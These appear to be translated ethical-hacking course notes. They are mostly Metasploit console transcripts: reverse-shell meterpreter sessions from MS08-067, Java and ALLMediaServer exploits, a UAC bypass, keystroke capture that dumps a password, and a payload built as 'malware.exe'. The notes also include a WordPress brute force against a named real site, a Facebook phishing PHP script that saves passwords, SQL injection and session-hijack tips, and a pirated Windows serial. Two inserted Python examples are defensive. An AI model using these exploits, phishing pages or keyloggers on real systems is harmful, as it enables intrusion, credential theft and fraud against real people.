CEH Notes (Apuntes CEH)


    5/25/2018 Apuntes Ceh

    CEH NOTES

    THERE IS NO CULTURE AROUND CLICKING!!!

    Detailed searching with Google

    allinurl php?id=

    allinurl: unillanos.edu.co filetype:pdf

    site: unillanos.edu.co -> returns subdomains

    allintitle:*/Index of

    allinurl: /wp-admin.php?

    Look up the FOCA tool; it pulls metadata

    VULNERABILITY ANALYSIS

    go to secpoint.com -> freetools

    download the Google Hack DB tool

    unzip google-hack-db-tool-1.5.zip
    cd googleDB\ tool\ 1.5/
    ls
    ls db/
    python googleDB-tool.py -s mkit.com.ar -o mkit.html db/vulnerabilities.txt
    less mkit.html
    geany mkit.html

    DETECTING INFO VIA TELNET

    root@bt:~/Downloads/googleDB tool 1.5# telnet www.google.com 80

    Trying 173.194.37.146...

    Connected to www.google.com.

    Escape character is '^]'.

    GET HTTP 1.1 /

    HTTP/1.0 400 Bad Request

    Content-Type: text/html; charset=UTF-8

    Content-Length: 1419

    Date: Mon, 05 May 2014 20:43:58 GMT

    Server: GFE/2.0

    root@bt:~/Downloads/googleDB tool 1.5# telnet www.unillanos.edu.co 80

    Trying 190.0.246.67...

    Connected to unillanos.edu.co.

    Escape character is '^]'.

    get http 1.1 /

    HTTP/1.1 408 Request Time-out

    Date: Mon, 05 May 2014 20:47:05 GMT

    Server: Apache/2.2.22 (Ubuntu)

    Vary: Accept-Encoding

    Content-Length: 309

    Connection: close

    Content-Type: text/html; charset=iso-8859-1

    408 Request Time-out

    Request Time-out

    Server timeout waiting for the HTTP request from the client.

    Apache/2.2.22 (Ubuntu) Server at www.unillanos.edu.co Port 80

    Connection closed by foreign host.

    SCAN GENERATING A NULL OVER AN IP RANGE

    root@bt:~/Downloads/googleDB tool 1.5# nmap -sn -vv 192.168.72.1-255

    Starting Nmap 6.01 ( http://nmap.org ) at 2014-05-05 17:55 ART

    Initiating Ping Scan at 17:55

    Scanning 255 hosts [4 ports/host]

    Ping Scan Timing: About 15.25% done; ETC: 17:58 (0:02:52 remaining)

    SCAN GENERATING A NULL OVER AN IP RANGE

    root@bt:~/Downloads/googleDB tool 1.5# nmap -sS -vv 192.168.72.1-255

    ATTACK METHODOLOGY

    Verify active hosts
    Identify open ports
    Identify OS and services
    Analyze vulnerabilities
    Build the attack map
    Configure the proxies?
    Attack

    EXPLOITS

    FAMOUS ONES

    MS08-067

    MS09-050

    MS10-020: IIS MUST BE ACTIVE.

    EXPLOITS: METASPLOIT (it is written in Ruby)

    Enumeration weaknesses, as in WordPress: the message "the user is incorrect" already saves me more than half the work.

    ENTER

    cd /opt/metasploit

    EXAMPLE ATTACK ON WORDPRESS

    msf > show modules

    msf > use auxiliary/scanner/http/wordpress_login_enum

    msf auxiliary(wordpress_login_enum) > show options

    Module options (auxiliary/scanner/http/wordpress_login_enum):

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    BLANK_PASSWORDS false no Try blank passwords for all users

    BRUTEFORCE true yes Perform brute force authentication

    BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

    DB_ALL_CREDS false no Try each user/password couple stored in the current

    database

    DB_ALL_PASS false no Add all passwords in the current database to the list

    DB_ALL_USERS false no Add all users in the current database to the list

    ENUMERATE_USERNAMES true yes Enumerate usernames

    PASSWORD no A specific password to authenticate with

    PASS_FILE no File containing passwords, one per line

    Proxies no Use a proxy chain

    RANGE_END 10 no Last user id to enumerate

    RANGE_START 1 no First user id to enumerate

    RHOSTS yes The target address range or CIDR identifier

    RPORT 80 yes The target port

    STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

    TARGETURI / yes The base path to the wordpress application

    THREADS 1 yes The number of concurrent threads

    USERNAME no A specific username to authenticate as

    USERPASS_FILE no File containing users and passwords separated by space, one pair per line

    USER_AS_PASS false no Try the username as the password for all users


    USER_FILE no File containing usernames, one per line

    VALIDATE_USERS true yes Validate usernames

    VERBOSE true yes Whether to print output for all attempts

    VHOST no HTTP server virtual host

    msf auxiliary(wordpress_login_enum) > set RHOSTS www.mkit.com.ar

    RHOSTS => www.mkit.com.ar

    msf auxiliary(wordpress_login_enum) > set TARGETURI /blog/

    TARGETURI => /blog/

    msf auxiliary(wordpress_login_enum) > exploit

    [-] /blog/ does not seeem to be Wordpress site

    [*] Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed

    msf auxiliary(wordpress_login_enum) > set VHOST www.mkit.com.ar

    VHOST => www.mkit.com.ar

    msf auxiliary(wordpress_login_enum) > exploit

    [*] /blog/ - WordPress Version 3.6.1 detected

    [*] /blog/ - WordPress User-Enumeration - Running User Enumeration

    [+] /blog/ - Found user 'kacho' with id 1

    [+] /blog/ - Found user 'chino' with id 2

    [+] /blog/ - Found user 'mkit' with id 3

    [+] /blog/ - Found user 'nutria' with id 4

    [*] /blog/ - Usernames stored in:

    /root/.msf4/loot/20140505194954_default_74.63.249.67_wordpress.users_146048.txt

    [*] /blog/ - WordPress User-Validation - Running User Validation

    [*] /blog/ - WordPress User-Validation - Checking Username:''

    [-] /blog/ - WordPress User-Validation - Invalid Username: ''

    [*] /blog/ - WordPress Brute Force - Running Bruteforce

    [*] /blog/ - Brute-forcing previously found accounts...

    [*] /blog/ - WordPress Brute Force - Trying username:'kacho' with password:''

    [-] /blog/ - WordPress Brute Force - Failed to login as 'kacho'

    [*] /blog/ - WordPress Brute Force - Trying username:'chino' with password:''

    [-] /blog/ - WordPress Brute Force - Failed to login as 'chino'

    [*] /blog/ - WordPress Brute Force - Trying username:'mkit' with password:''

    [-] /blog/ - WordPress Brute Force - Failed to login as 'mkit'

    [*] /blog/ - WordPress Brute Force - Trying username:'nutria' with password:''

    [-] /blog/ - WordPress Brute Force - Failed to login as 'nutria'

    [*] Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed

    msf auxiliary(wordpress_login_enum) >back

    msf>clear
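Added example, not from the notes: the footprint a run like the one above leaves in the web server's access log, with a small Python detector for it. It assumes Apache combined log format, that user enumeration goes through GET /?author=N redirects (the id range RANGE_START/RANGE_END covers), and that a failed POST to wp-login.php returns 200 while a success redirects with 302; the log lines are constructed.

```python
# Added example, not from the notes: flag the access-log footprint left by a
# wordpress_login_enum-style run. Assumptions: Apache combined log format;
# enumeration via GET /?author=N; password guessing via POST wp-login.php,
# where a failure returns 200 and a success redirects with 302.
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
AUTHOR_RE = re.compile(r"[?&]author=(\d+)")

# Constructed sample log: one scanner walking author ids 1-5, then guessing
# passwords for the names it found; one ordinary user logging in normally.
SAMPLE_LOG = """\
203.0.113.7 - - [05/May/2014:19:49:50 -0300] "GET /blog/?author=1 HTTP/1.1" 301 0
203.0.113.7 - - [05/May/2014:19:49:50 -0300] "GET /blog/?author=2 HTTP/1.1" 301 0
203.0.113.7 - - [05/May/2014:19:49:51 -0300] "GET /blog/?author=3 HTTP/1.1" 301 0
203.0.113.7 - - [05/May/2014:19:49:51 -0300] "GET /blog/?author=4 HTTP/1.1" 301 0
203.0.113.7 - - [05/May/2014:19:49:52 -0300] "GET /blog/?author=5 HTTP/1.1" 404 1200
203.0.113.7 - - [05/May/2014:19:49:53 -0300] "POST /blog/wp-login.php HTTP/1.1" 200 3400
203.0.113.7 - - [05/May/2014:19:49:53 -0300] "POST /blog/wp-login.php HTTP/1.1" 200 3400
203.0.113.7 - - [05/May/2014:19:49:54 -0300] "POST /blog/wp-login.php HTTP/1.1" 200 3400
203.0.113.7 - - [05/May/2014:19:49:54 -0300] "POST /blog/wp-login.php HTTP/1.1" 200 3400
198.51.100.9 - - [05/May/2014:19:50:10 -0300] "GET /blog/?author=1 HTTP/1.1" 301 0
198.51.100.9 - - [05/May/2014:19:50:30 -0300] "POST /blog/wp-login.php HTTP/1.1" 302 0
"""


def parse_line(line):
    """Fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(log_text, enum_threshold=3, guess_threshold=3):
    """Per source IP: distinct author ids probed and failed wp-login POSTs.
    Returns only the IPs that cross a threshold, with the evidence."""
    stats = defaultdict(lambda: {"author_ids": set(), "failed_logins": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        probe = AUTHOR_RE.search(rec["path"])
        if rec["method"] == "GET" and probe:
            stats[rec["ip"]]["author_ids"].add(int(probe.group(1)))
        elif (rec["method"] == "POST" and rec["path"].endswith("wp-login.php")
              and rec["status"] != "302"):
            stats[rec["ip"]]["failed_logins"] += 1
    findings = {}
    for ip, s in stats.items():
        flags = []
        if len(s["author_ids"]) >= enum_threshold:
            flags.append("user-enumeration")
        if s["failed_logins"] >= guess_threshold:
            flags.append("password-guessing")
        if flags:
            findings[ip] = {"flags": flags, "author_ids": sorted(s["author_ids"]),
                            "failed_logins": s["failed_logins"]}
    return findings
```

The hardening counterpart on the WordPress side is to return the same generic error for an unknown user and a wrong password and to stop the /?author=N redirect from exposing the login name, so the enumeration step this transcript relies on finds nothing.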

    ANOTHER ATTACK:

    msf> search ms08

    soft Internet Explorer Data Binding Memory Corruption

    exploit/windows/smb/ms08_067_netapi


    msf> use exploit/windows/smb/ms08_067_netapi

    msf exploit(ms08_067_netapi) > set RHOST 192.168.237.2

    RHOST => 192.168.237.2

    msf exploit(ms08_067_netapi) > show targets

    msf exploit(ms08_067_netapi) > show options

    Module options (exploit/windows/smb/ms08_067_netapi):

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    RHOST 192.168.237.2 yes The target address

    RPORT 445 yes Set the SMB service port

    SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

    Exploit target:

    Id Name

    -- ----

    0 Automatic Targeting

    msf exploit(ms08_067_netapi) > show payloads

    Compatible Payloads

    ===================

    Name Disclosure Date Rank Description

    flective Injection), Reverse TCP Stager

    windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter

    (Reflective Injection), Reverse All-Port TCP Stager

    msf exploit(ms08_067_netapi) > set payload windows/patchupmeterpreter/bind_ipv6_tcp

    payload => windows/patchupmeterpreter/bind_ipv6_tcp

    set LHOST 192.168.237.1 (attacking machine)

    set LPORT 1234

    exploit

    CORRECTED METERPRETER WORKSHOP

    root@bt:~# msfconsole


    =[ metasploit v4.9.2-dev [core:4.9 api:1.0] ]

    + -- --=[ 1295 exploits - 695 auxiliary - 207 post ]

    + -- --=[ 335 payloads - 35 encoders - 8 nops ]

    msf > use exploit/windows/smb/ms08_067_netapi

    msf exploit(ms08_067_netapi) > set RHOST 192.168.237.129

    RHOST => 192.168.237.129

    msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

    payload => windows/meterpreter/reverse_tcp

    msf exploit(ms08_067_netapi) > set LHOST 192.168.237.128

    LHOST => 192.168.237.128

    msf exploit(ms08_067_netapi) > set LPORT 1234

    LPORT => 1234

    msf exploit(ms08_067_netapi) > show aoptions

    [-] Invalid parameter "aoptions", use "show -h" for more information

    msf exploit(ms08_067_netapi) > show options

    Module options (exploit/windows/smb/ms08_067_netapi):


    Name Current Setting Required Description

    ---- --------------- -------- -----------

    RHOST 192.168.237.129 yes The target address

    RPORT 445 yes Set the SMB service port

    SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

    Payload options (windows/meterpreter/reverse_tcp):

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)

    LHOST 192.168.237.128 yes The listen address

    LPORT 1234 yes The listen port

    Exploit target:

    Id Name

    -- ----

    0 Automatic Targeting

    msf exploit(ms08_067_netapi) > rexploit

    [*] Reloading module...

    [*] Started reverse handler on 192.168.237.128:1234

    [*] Automatically detecting the target...

    [*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown

    [*] We could not detect the language pack, defaulting to English

    [*] Selected Target: Windows 2003 SP2 English (NX)

    [*] Attempting to trigger the vulnerability...

    [*] Sending stage (769536 bytes) to 192.168.237.129

    [*] Meterpreter session 1 opened (192.168.237.128:1234 -> 192.168.237.129:1027) at 2014-05-06 12:47:59 -0300

    meterpreter > getpid

    Current pid: 828

    meterpreter >

    TUESDAY WORKSHOP

    XP serial RHKG3 8YW4W 4RHJG 83M4Y 7X9GW

    Install Windows 7.

    Go to http://pastebin.com/4ZZdFLuU and download


    w32-exec-calc-shellcode.bin

    jre-7u7-windows-i586-iftw.exe

    ALLMediaServer.exe

    METERPRETER ON WINDOWS 7 AND JAVA 7

    root@bt:~# msfconsole


    =[ metasploit v4.9.2-dev [core:4.9 api:1.0] ]

    + -- --=[ 1295 exploits - 695 auxiliary - 207 post ]

    + -- --=[ 335 payloads - 35 encoders - 8 nops ]

    msf > use exploit/multi/browser/java_jre17_jaxws

    msf exploit(java_jre17_jaxws) > set SRVPORT 80

    SRVPORT => 80

    msf exploit(java_jre17_jaxws) > set URIPATH /soyunarchivolindo.php

    URIPATH => /soyunarchivolindo.php

    msf exploit(java_jre17_jaxws) > set target 1

    target => 1

    msf exploit(java_jre17_jaxws) > set payload windows/meterpreter/reverse_tcp

    payload => windows/meterpreter/reverse_tcp

    msf exploit(java_jre17_jaxws) > set LHOST 192.168.237.128

    LHOST => 192.168.237.128

    msf exploit(java_jre17_jaxws) > exploit

    [*] Exploit running as background job.

    [*] Started reverse handler on 192.168.237.128:4444

    [*] Using URL: http://0.0.0.0:80/soyunarchivolindo.php

    [*] Local IP: http://192.168.237.128:80/soyunarchivolindo.php

    [*] Server started.

    HERE IE IS POINTED AT THE PHP PATH: http://192.168.237.128:80/soyunarchivolindo.php

    msf exploit(java_jre17_jaxws) > [*] 192.168.237.132 java_jre17_jaxws - Java Applet JAX-WS Remote Code Execution handling request

    [*] 192.168.237.132 java_jre17_jaxws - Sending Applet.jar

    [*] 192.168.237.132 java_jre17_jaxws - Sending Applet.jar

    [*] Sending stage (769536 bytes) to 192.168.237.132

    [*] Meterpreter session 1 opened (192.168.237.128:4444 -> 192.168.237.132:49224) at 2014-05-06 13:33:44 -0300

    msf exploit(java_jre17_jaxws) > sessions -i 1

    [*] Starting interaction with 1...

    meterpreter > run bypassuac

    [*] Creating a reverse meterpreter stager: LHOST=192.168.237.128 LPORT=4546

    [*] Running payload handler

    [*] Uploading Windows UACBypass to victim machine.

    [*] Bypassing UAC Restrictions on the system....

    [*] Meterpreter stager executable 73802 bytes long

    [*] Uploaded the agent to the filesystem....

    [*] Executing the agent with endpoint 192.168.237.128:4546 with UACBypass in effect...

    [*] C:\Users\felcor\AppData\Local\Temp\QHayEz.exe /c %TEMP%\siwDGh.exe

    meterpreter > [*] Meterpreter session 2 opened (192.168.237.128:4546 -> 192.168.237.132:49225) at 2014-05-06 13:36:01 -0300

    meterpreter > sessions -i 2

    [-] Unknown command: sessions.

    meterpreter > sessions -i

    [-] Unknown command: sessions.

    meterpreter > sessions -i 2

    [-] Unknown command: sessions.

    meterpreter > sessions -i -2

    [-] Unknown command: sessions.

    meterpreter > sessions -i

    [-] Unknown command: sessions.

    meterpreter > exit

    [*] Shutting down Meterpreter...

    [*] 192.168.237.132 - Meterpreter session 1 closed. Reason: User exit

    msf exploit(java_jre17_jaxws) > sessions -i

    Active sessions

    ===============

    Id Type Information Connection

    -- ---- ----------- ----------

    2 meterpreter x86/win32 PC\felcor @ PC 192.168.237.128:4546 -> 192.168.237.132:49225 (192.168.237.132)

    msf exploit(java_jre17_jaxws) > sessions -i 2

    [*] Starting interaction with 2...

    meterpreter > shell

    Process 3800 created.

    Channel 1 created.

    Microsoft Windows [Versión 6.1.7601]

    Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.


    C:\Windows\System32>

    ALLMEDIASERVER EXPLOIT

    msf > search allmediaserver

    [!] Database not connected or cache not built, using slow search

    Matching Modules

    ================

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    exploit/windows/misc/allmediaserver_bof 2012-07-04 normal ALLMediaServer 0.8 Buffer Overflow

    msf >

    msf > use exploit/windows/misc/allmediaserver_bof

    msf exploit(allmediaserver_bof) > show options

    Module options (exploit/windows/misc/allmediaserver_bof):

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    RHOST yes The target address

    RPORT 888 yes The target port

    Exploit target:

    Id Name

    -- ----

    1 ALLMediaServer 0.8 / Windows 7 SP1 - English

    msf exploit(allmediaserver_bof) > set RHOST 192.168.237.132

    RHOST => 192.168.237.132

    msf exploit(allmediaserver_bof) > show options

    Module options (exploit/windows/misc/allmediaserver_bof):

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    RHOST 192.168.237.132 yes The target address

    RPORT 888 yes The target port

    Exploit target:


    Id Name

    -- ----

    1 ALLMediaServer 0.8 / Windows 7 SP1 - English

    msf exploit(allmediaserver_bof) > set payload windows/meterpreter/reverse_tcp

    payload => windows/meterpreter/reverse_tcp

    msf exploit(allmediaserver_bof) > set LHOST 192.168.237.128

    LHOST => 192.168.237.128

    msf exploit(allmediaserver_bof) > show options

    Module options (exploit/windows/misc/allmediaserver_bof):

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    RHOST 192.168.237.132 yes The target address

    RPORT 888 yes The target port

    Payload options (windows/meterpreter/reverse_tcp):

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)

    LHOST 192.168.237.128 yes The listen address

    LPORT 4444 yes The listen port

    Exploit target:

    Id Name

    -- ----

    1 ALLMediaServer 0.8 / Windows 7 SP1 - English

    msf exploit(allmediaserver_bof) > exploit

    [*] Started reverse handler on 192.168.237.128:4444

    [*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...

    [*] Sending stage (769536 bytes) to 192.168.237.132

    [*] Meterpreter session 1 opened (192.168.237.128:4444 -> 192.168.237.132:49166) at 2014-05-06 13:53:33 -0300

    meterpreter > shell

    Process 2688 created.

    Channel 1 created.

    Microsoft Windows [Versión 6.1.7601]

    Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.

    C:\Program Files (x86)\ALLMediaServer>


    _________________________________________

    FROM METERPRETER I CAN RUN:

    keyscan_start

    keyscan_dump

    keyscan_stop

    screenshot

    Example:

    meterpreter > keyscan_start

    Starting the keystroke sniffer...

    meterpreter > keyscan_dump

    Dumping captured keystrokes...

    usuariofe

    felipe 12345123

    meterpreter > keyscan_stop

    Stopping the keystroke sniffer...

    meterpreter > screenshot

    Screenshot saved to: /root/zKlrQWxJ.jpeg

    meterpreter >

    _________________________________________

    ALTERNATIVE TO THE MSFCONSOLE CONSOLE:

    root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.237.132 LPORT=1234 x > malware.exe

    PHISHING

    COPY FACEBOOK'S login.php FILE

    Change the action to auth.php,

    CREATE THE ACTION FILE

    root@bt:~# cat /var/www/out.php


    <?php
    $myfile = fopen("passwords.txt","a+");
    fwrite($myfile,$_POST['email']." : ".$_POST['pass']."\n");
    ?>

    Mask the URL with facebook

    www.facebook.comAAAAAAAAwww.otro.com

    ____________________________________

    WEB SECURITY

    Two types

    1. SQL INJECTION
    2. Cross-Site Scripting (XSS)

    SEE THE SQL INJECTION IMAGE!!!

    Tools: sqlmap, sqlninja. There are analyzers for each CMS. In BackTrack: pentest -> cms..

    SQL for searches that return several records.

    ' OR '1'='1
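The probe above carried through in Python as an added example (not from the notes): a name search that should return one record, built once by string concatenation and once with a bound parameter, against an in-memory sqlite3 table with constructed rows (the names are the ones the enumeration earlier found). A small log-side check for the probe's shape is included as well.

```python
# Added example, not from the notes: the ' OR '1'='1 probe against a name
# search built two ways. In-memory sqlite3 with constructed rows.
import re
import sqlite3

PROBE = "' OR '1'='1"


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    con.executemany("INSERT INTO users (name, role) VALUES (?, ?)",
                    [("kacho", "admin"), ("chino", "editor"),
                     ("mkit", "editor"), ("nutria", "author")])
    return con


def search_vulnerable(con, term):
    # String concatenation: the quote in the input closes the literal and the
    # rest of the input (OR '1'='1) becomes part of the WHERE clause, so the
    # condition is true for every row and the whole table comes back.
    sql = "SELECT name FROM users WHERE name = '" + term + "' ORDER BY id"
    return [row[0] for row in con.execute(sql)]


def search_safe(con, term):
    # Bound parameter: the value never enters the SQL text, so the quote is
    # only a character to compare against and the probe matches no row.
    rows = con.execute("SELECT name FROM users WHERE name = ? ORDER BY id", (term,))
    return [row[0] for row in rows]


def looks_like_injection(term):
    # Cheap check for request logs or a WAF rule: a quote followed by OR/AND,
    # or an SQL comment marker. Detection only; the real fix is search_safe.
    return re.search(r"'\s*(or|and)\s|--|/\*", term, re.IGNORECASE) is not None
```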

    Check the MySQL out file

    Make a shell in PHP and try to upload it: there are more advanced ones


    The browser has cookie-management extensions: cookie editor!

    Tool: Greasemonkey add-on for Firefox, and download the injector script! That is where I enter the dump captured with Wireshark.

    Look up session hijacking mkit argentina www.mkit.com.ar/blog.

    backup.dedalo.in

    see the pages of:

    sniffer labs from Bolivia

    dragonjar

    security by default
